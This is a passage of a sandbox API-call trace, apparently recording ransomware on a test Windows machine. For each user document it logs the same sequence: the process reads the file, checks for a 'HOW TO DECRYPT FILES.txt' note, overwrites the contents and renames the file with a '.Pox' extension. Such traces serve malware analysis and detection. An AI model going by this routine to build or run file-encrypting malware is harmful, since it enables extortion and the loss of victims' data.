lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fKdo0m3dDNNLylacs0H.xlsx.Pox", lpFilePart=0x0) returned 0x44 [0039.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0039.037] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fKdo0m3dDNNLylacs0H.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fkdo0m3ddnnlylacs0h.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb7600d0, ftCreationTime.dwHighDateTime=0x1d4c0e5, ftLastAccessTime.dwLowDateTime=0xaedc5c30, ftLastAccessTime.dwHighDateTime=0x1d4e67b, ftLastWriteTime.dwLowDateTime=0x29746180, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x16c40)) returned 1 [0039.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0039.038] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fKdo0m3dDNNLylacs0H.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fkdo0m3ddnnlylacs0h.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fKdo0m3dDNNLylacs0H.xlsx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fkdo0m3ddnnlylacs0h.xlsx.pox")) returned 1 [0039.038] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I5LVn7OvnVGp4I.xlsx", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I5LVn7OvnVGp4I.xlsx", lpFilePart=0x0) returned 0x3b [0039.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0039.038] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I5LVn7OvnVGp4I.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i5lvn7ovnvgp4i.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.038] GetFileType (hFile=0x26c) returned 0x1 [0039.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0039.038] GetFileType (hFile=0x26c) returned 0x1 [0039.038] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x6eef [0039.038] ReadFile (in: hFile=0x26c, lpBuffer=0x23e5d54, nNumberOfBytesToRead=0x6eef, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x23e5d54*, lpNumberOfBytesRead=0x3ae570*=0x6eef, lpOverlapped=0x0) returned 1 [0039.039] CloseHandle (hObject=0x26c) returned 1 [0039.054] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.054] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0039.054] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.054] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0039.054] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I5LVn7OvnVGp4I.xlsx", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I5LVn7OvnVGp4I.xlsx", lpFilePart=0x0) returned 0x3b [0039.054] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0039.054] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I5LVn7OvnVGp4I.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i5lvn7ovnvgp4i.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.055] GetFileType (hFile=0x26c) returned 0x1 [0039.055] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0039.055] GetFileType (hFile=0x26c) returned 0x1 [0039.055] WriteFile (in: hFile=0x26c, lpBuffer=0x245574c*, nNumberOfBytesToWrite=0x6ef0, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x245574c*, lpNumberOfBytesWritten=0x3ae564*=0x6ef0, lpOverlapped=0x0) returned 1 [0039.057] CloseHandle (hObject=0x26c) returned 1 [0039.057] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I5LVn7OvnVGp4I.xlsx", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I5LVn7OvnVGp4I.xlsx", lpFilePart=0x0) returned 0x3b [0039.057] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I5LVn7OvnVGp4I.xlsx.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I5LVn7OvnVGp4I.xlsx.Pox", lpFilePart=0x0) returned 0x3f [0039.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0039.057] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I5LVn7OvnVGp4I.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i5lvn7ovnvgp4i.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77298290, ftCreationTime.dwHighDateTime=0x1d51461, ftLastAccessTime.dwLowDateTime=0x1c284890, ftLastAccessTime.dwHighDateTime=0x1d4b2af, ftLastWriteTime.dwLowDateTime=0x2976c2e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x6ef0)) returned 1 [0039.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0039.058] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I5LVn7OvnVGp4I.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i5lvn7ovnvgp4i.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I5LVn7OvnVGp4I.xlsx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i5lvn7ovnvgp4i.xlsx.pox")) returned 1 [0039.058] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KsPNdEKyG-iF8dd5Hv.xlsx", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KsPNdEKyG-iF8dd5Hv.xlsx", lpFilePart=0x0) returned 0x3f [0039.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0039.058] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KsPNdEKyG-iF8dd5Hv.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kspndekyg-if8dd5hv.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.058] GetFileType (hFile=0x26c) returned 0x1 [0039.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0039.058] GetFileType (hFile=0x26c) returned 0x1 [0039.058] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x13418 [0039.059] ReadFile (in: hFile=0x26c, lpBuffer=0x245cbd0, nNumberOfBytesToRead=0x13418, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x245cbd0*, lpNumberOfBytesRead=0x3ae570*=0x13418, lpOverlapped=0x0) returned 1 [0039.060] CloseHandle (hObject=0x26c) returned 1 [0039.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0039.077] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0039.077] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KsPNdEKyG-iF8dd5Hv.xlsx", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KsPNdEKyG-iF8dd5Hv.xlsx", lpFilePart=0x0) returned 0x3f [0039.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0039.077] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KsPNdEKyG-iF8dd5Hv.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kspndekyg-if8dd5hv.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.078] GetFileType (hFile=0x26c) returned 0x1 [0039.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0039.078] GetFileType (hFile=0x26c) returned 0x1 [0039.078] WriteFile (in: hFile=0x26c, lpBuffer=0x24e362c*, nNumberOfBytesToWrite=0x13420, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x24e362c*, lpNumberOfBytesWritten=0x3ae564*=0x13420, lpOverlapped=0x0) returned 1 [0039.080] CloseHandle (hObject=0x26c) returned 1 [0039.081] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KsPNdEKyG-iF8dd5Hv.xlsx", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KsPNdEKyG-iF8dd5Hv.xlsx", lpFilePart=0x0) returned 0x3f [0039.081] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KsPNdEKyG-iF8dd5Hv.xlsx.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KsPNdEKyG-iF8dd5Hv.xlsx.Pox", lpFilePart=0x0) returned 0x43 [0039.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0039.081] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KsPNdEKyG-iF8dd5Hv.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kspndekyg-if8dd5hv.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb167c870, ftCreationTime.dwHighDateTime=0x1d4fe29, ftLastAccessTime.dwLowDateTime=0x39f67c0, ftLastAccessTime.dwHighDateTime=0x1d4c43b, ftLastWriteTime.dwLowDateTime=0x29792440, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x13420)) returned 1 [0039.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0039.082] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KsPNdEKyG-iF8dd5Hv.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kspndekyg-if8dd5hv.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KsPNdEKyG-iF8dd5Hv.xlsx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kspndekyg-if8dd5hv.xlsx.pox")) returned 1 [0039.082] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\m7dOR-18S 2XvaRj3rX9.pptx", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\m7dOR-18S 2XvaRj3rX9.pptx", lpFilePart=0x0) returned 0x41 [0039.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0039.082] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\m7dOR-18S 2XvaRj3rX9.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m7dor-18s 2xvarj3rx9.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.082] GetFileType (hFile=0x26c) returned 0x1 [0039.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0039.083] GetFileType (hFile=0x26c) returned 0x1 [0039.083] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x69b8 [0039.083] ReadFile (in: hFile=0x26c, lpBuffer=0x24f7028, nNumberOfBytesToRead=0x69b8, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x24f7028*, lpNumberOfBytesRead=0x3ae570*=0x69b8, lpOverlapped=0x0) returned 1 [0039.099] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0039.099] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0039.100] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\m7dOR-18S 2XvaRj3rX9.pptx", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\m7dOR-18S 2XvaRj3rX9.pptx", lpFilePart=0x0) returned 0x41 [0039.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0039.100] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\m7dOR-18S 2XvaRj3rX9.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m7dor-18s 2xvarj3rx9.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.100] GetFileType (hFile=0x26c) returned 0x1 [0039.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0039.101] GetFileType (hFile=0x26c) returned 0x1 [0039.101] WriteFile (in: hFile=0x26c, lpBuffer=0x2564ed0*, nNumberOfBytesToWrite=0x69c0, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x2564ed0*, lpNumberOfBytesWritten=0x3ae564*=0x69c0, lpOverlapped=0x0) returned 1 [0039.102] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\m7dOR-18S 2XvaRj3rX9.pptx", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\m7dOR-18S 2XvaRj3rX9.pptx", lpFilePart=0x0) returned 0x41 [0039.102] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\m7dOR-18S 2XvaRj3rX9.pptx.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\m7dOR-18S 2XvaRj3rX9.pptx.Pox", lpFilePart=0x0) returned 0x45 [0039.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0039.102] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\m7dOR-18S 2XvaRj3rX9.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m7dor-18s 2xvarj3rx9.pptx"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bf6c2a0, ftCreationTime.dwHighDateTime=0x1d4f49e, ftLastAccessTime.dwLowDateTime=0x2ac14be0, ftLastAccessTime.dwHighDateTime=0x1d4bec6, ftLastWriteTime.dwLowDateTime=0x297de700, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x69c0)) returned 1 [0039.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0039.102] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\m7dOR-18S 2XvaRj3rX9.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m7dor-18s 2xvarj3rx9.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\m7dOR-18S 2XvaRj3rX9.pptx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m7dor-18s 2xvarj3rx9.pptx.pox")) returned 1 [0039.104] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MUl3j_Wys.docx", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MUl3j_Wys.docx", lpFilePart=0x0) returned 0x36 [0039.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0039.104] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MUl3j_Wys.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mul3j_wys.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.104] GetFileType (hFile=0x26c) returned 0x1 [0039.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0039.104] GetFileType (hFile=0x26c) returned 0x1 [0039.104] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x15b41 [0039.104] ReadFile (in: hFile=0x26c, lpBuffer=0x3655640, nNumberOfBytesToRead=0x15b41, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x3655640*, lpNumberOfBytesRead=0x3ae570*=0x15b41, lpOverlapped=0x0) returned 1 [0039.164] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0039.164] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0039.165] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MUl3j_Wys.docx", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MUl3j_Wys.docx", lpFilePart=0x0) returned 0x36 [0039.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0039.165] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MUl3j_Wys.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mul3j_wys.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.165] GetFileType (hFile=0x26c) returned 0x1 [0039.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0039.165] GetFileType (hFile=0x26c) returned 0x1 [0039.165] WriteFile (in: hFile=0x26c, lpBuffer=0x366b1a0*, nNumberOfBytesToWrite=0x15b50, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x366b1a0*, lpNumberOfBytesWritten=0x3ae564*=0x15b50, lpOverlapped=0x0) returned 1 [0039.167] CloseHandle (hObject=0x26c) returned 1 [0039.168] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MUl3j_Wys.docx", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MUl3j_Wys.docx", lpFilePart=0x0) returned 0x36 [0039.168] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MUl3j_Wys.docx.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MUl3j_Wys.docx.Pox", lpFilePart=0x0) returned 0x3a [0039.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0039.169] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MUl3j_Wys.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mul3j_wys.docx"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab4e8f0, ftCreationTime.dwHighDateTime=0x1d52638, ftLastAccessTime.dwLowDateTime=0xe6655320, ftLastAccessTime.dwHighDateTime=0x1d526d4, ftLastWriteTime.dwLowDateTime=0x29876c80, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x15b50)) returned 1 [0039.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0039.169] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MUl3j_Wys.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mul3j_wys.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MUl3j_Wys.docx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mul3j_wys.docx.pox")) returned 1 [0039.170] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OZlfj3nx.csv", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OZlfj3nx.csv", lpFilePart=0x0) returned 0x34 [0039.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0039.170] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OZlfj3nx.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ozlfj3nx.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.170] GetFileType (hFile=0x26c) returned 0x1 [0039.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0039.170] GetFileType (hFile=0x26c) returned 0x1 [0039.170] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x6c63 [0039.170] ReadFile (in: hFile=0x26c, lpBuffer=0x23b9eec, nNumberOfBytesToRead=0x6c63, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x23b9eec*, lpNumberOfBytesRead=0x3ae570*=0x6c63, lpOverlapped=0x0) returned 